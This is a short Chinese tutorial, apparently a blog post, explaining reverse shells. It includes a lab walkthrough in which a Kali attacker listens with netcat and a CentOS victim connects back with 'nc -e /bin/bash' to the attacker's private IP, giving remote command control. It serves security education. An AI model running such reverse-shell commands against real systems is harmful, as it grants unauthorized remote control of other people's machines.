反弹shell

目录

前言

反弹shell

攻击机监听本机端口

被攻击机发起连接

攻击机操作


前言

反弹shell是一种网络技术,主要用于在攻击者和被攻击者之间建立命令行的输入输出控制通道。与常规的远程连接方式不同,反弹shell是由被攻击者主动向外连接攻击者,而不是由攻击者连接到被攻击者。

反弹shell通常用于被控端受到防火墙限制、无法接受外部连接、或者IP地址动态变化等情况。这种技术确保即使被控设备位于内部网络中,或者由于某些安全限制无法被直接访问时,攻击者依然能够实现远程控制。


反弹shell

攻击机kali ip 192.168.100.222

被攻击机centos ip 192.168.100.130

攻击机监听本机端口

nc -lvp 空闲端口

nc -lvp 4444


被攻击机发起连接

nc -e /bin/bash 攻击机ip 攻击机监听端口

nc -e /bin/bash 192.168.100.222 4444

如果没有报错或者退出当前命令行,说明连接建立成功


攻击机操作

回到攻击机:

结果显示连接成功

这是就可以进行进一步命令操作了:



相关推荐
DO_Community1 分钟前
DigitalOcean Droplet 云服务器:新增自动扩展池功能
服务器
安科瑞刘鸿鹏5 分钟前
老旧小区用电安全保护装置#限流式防火保护器参数介绍#
运维·服务器·物联网·能源
Rain_Rong25 分钟前
linux检测硬盘
linux·运维·服务器
我曾经是个程序员1 小时前
鸿蒙学习记录之http网络请求
服务器·学习·http
0zxm1 小时前
06 - Django 视图view
网络·后端·python·django
真真-真真1 小时前
WebXR
linux·运维·服务器
hao_wujing1 小时前
网络安全攻防演练中的常见计策
安全·web安全
轩辰~2 小时前
网络协议入门
linux·服务器·开发语言·网络·arm开发·c++·网络协议
燕雀安知鸿鹄之志哉.2 小时前
攻防世界 web ics-06
网络·经验分享·安全·web安全·网络安全
wanhengidc2 小时前
短视频运营行业该如何选择服务器?
运维·服务器